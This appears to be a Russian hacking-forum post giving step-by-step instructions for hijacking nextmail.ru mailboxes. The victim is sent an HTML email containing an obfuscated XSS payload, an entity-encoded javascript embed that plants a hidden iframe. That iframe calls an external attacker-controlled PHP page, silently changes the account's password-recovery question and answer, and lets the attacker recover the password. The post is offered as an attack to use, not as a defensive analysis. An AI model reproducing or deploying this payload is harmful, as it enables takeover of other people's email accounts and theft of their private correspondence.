ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Да.. снова о взломе почты. Старым добрым проверенным способом. Кому-то может быть и надоело, но слишком часто встречаюца мне в последнее время такие &quot;чудесные&quot; творения веб-мастеров, и кому-то может будет даже интересно. Короче <span style='color:green'>http://nextmail.ru(xaker.ru, email.su, russian.ru, students.ru, programist.ru, designer.ru, mail2k.ru)</span>, об этой почте и пойдет речь. Заводим ящик на рамблер.ру, пишем письмо на адрес zlodey@nextmail.ru, в тело письма копируем:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
<embed src="&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&a mp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58 document.getElementById('xxx').innerHTML='<&amp;#1 05&amp;#102&amp;#114&amp;#97&amp;#109&amp;#101 src=http://znakomstva.flip.ru/pochta.php?quest=X&amp;answ=Y width=0 height=0></&amp;#105&amp;#102&amp;#114&amp;#97&amp;#109&amp;# 101>';this.wav" width=0 height=0>
<span id=xxx></span>[/QUOTE]<span id='postcolor'>

Перед отправкой ставим флажок &quot;в виде хтмл&quot;(чем мне и нравицца собственно рамблер). Злодей читает письмо, срабатывает наш скрипт(удивительно, но JS проходит почти любым способом, при том при всем, что в настройках ящика по умолчнию стоит повышенная безопасность, типа от всяких вредоносных скриптов)) скриптзначит срабатывает, прописывается &lt;iframe&gt;, вызывается пхп http://znakomstva.flip.ru/pochta.php?quest=X&amp;answ=Y , меняются: вопрос на X, ответ на Y.
Ну а дальше все понтно. Кстати оченб приятный интерфейс напоминания пароля)) Вводишь мыло, задается вопрос, вводишь ответ - и парольчик прямо тут и выдается) быстро и качественно, как говориться гыгы
Скрипт pochta.php не привожу, подобный уже был описан во взломе форум.хакер.ру